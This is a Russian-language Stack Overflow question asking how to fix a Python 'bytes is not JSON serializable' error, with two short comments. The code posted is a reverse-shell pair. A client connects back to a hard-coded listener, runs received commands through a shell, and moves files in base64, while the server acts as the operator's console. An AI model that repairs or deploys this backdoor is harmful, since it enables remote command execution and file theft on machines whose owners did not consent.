# Ошибка TypeError: Object of type bytes is not JSON serializable

Tags: python, json

Есть два файла, которые взаимодействуют друг с другом по принципу "сервер-клиент"

Код сервера:

```
#!/usr/bin/python
import socket, json, base64


class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print ("[+] Waiting for inomming connections")
        self.connection, address = listener.accept()
        print ("[+] Got a connection from " + str (address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.reliable_send(command)
        if command[0] == "exit":
            self.connection.close()
            exit()
            
        return self.reliable_receive()


    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(base64.b64decode(content))
            return "[+] Download successful."

    def read_file(self, path):
        with open(path, "rb") as file:
            return base64.b64encode(file.read())

    def run(self):
        while True:
            command = raw_input(">> ")
            command = command.split(" ")
            
            try:
                if command[0] == "upload":
                    file_content = self.read_file(command[1])
                    command.append(file_content)
                    
                result = self.execute_remotely(command)
                
                if command[0] == "download" and "[-] Error " not in result:
                    result = self.write_file(command[1], result)
            except Exception:
                result = "[-] Error during command execution."
            
            print(result)

my_listener = Listener("192.168.0.100", 8080)
my_listener.run()
```

Код клиента:

```
#!/usr/bin/env python3
import socket
import subprocess
import json
import os
import base64


class Main:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = b""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_system_command(self, command):

        return subprocess.check_output(command, shell=True)

    def change_working_directory_to(self, path):
        os.chdir(path)
        return "[+] Changing working directory to " + path

    def read_file(self, path):
        with open(path, "rb") as file:
            return base64.b64encode(file.read())

    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(base64.b64decode(content))
            return "[+] Upload successful."

    def run(self):
        while True:
            command = self.reliable_receive()
            
            try:
                if command[0] == "exit":
                    self.connection.close()
                    exit()
                elif command[0] == "cd" and len(command) > 1:
                    command_result = self.change_working_directory_to(command[1])
                elif command[0] == "download":
                    command_result = self.read_file(command[1])
                elif command[0] == "upload":
                    command_result = self.write_file(command[1], command[2])
                else:
                    command_result = self.execute_system_command(command)
            except Exception:
                command_result = "[-] Error during command execution."

            self.reliable_send(command_result)

my_Conn = Main("192.168.0.100", 8080)
my_Conn.run()
```

Ошибка:

```
Traceback (most recent call last):
  File "C:\Users\file_name.py", line 66, in <module>
    my_Conn.run()
  File "C:\Users\file_name.py", line 63, in run
    self.reliable_send(command_result)
  File "C:\Users\file_name.py", line 15, in reliable_send
    json_data = json.dumps(data)
  File "C:\Users\AppData\Local\Programs\Python\Python39-32\lib\json\__init__.py", line 231, in dumps
    return _default_encoder.encode(obj)
  File "C:\Users\AppData\Local\Programs\Python\Python39-32\lib\json\encoder.py", line 199, in encode
    chunks = self.iterencode(o, _one_shot=True)
  File "C:\Users\AppData\Local\Programs\Python\Python39-32\lib\json\encoder.py", line 257, in iterencode
    return _iterencode(o, 0)
  File "C:\Users\AppData\Local\Programs\Python\Python39-32\lib\json\encoder.py", line 179, in default
    raise TypeError(f'Object of type {o.__class__.__name__} '
TypeError: Object of type bytes is not JSON serializable
```

Мой вопрос, как бы, является продолжением к проблеме: [TypeError: can only concatenate str (not "bytes") to str](https://ru.stackoverflow.com/questions/1295718/typeerror-can-only-concatenate-str-not-bytes-to-str/1315433#1315433)

Подскажите, как исправить?

Comment: Смотря что за байты вы пытаетесь в json преобразовать, и зачем вы это пытаетесь сделать. Я предполагаю, что connection.send в любом случае не примет строку, которую возвращает json.dumps, и надо просто data, а не json_data отправлять.

Comment: Имеете в виду так:
`def reliable_send(self, data):   self.connection.send(data)` А в json планировалось упаковывать строки, файлы...вроде как.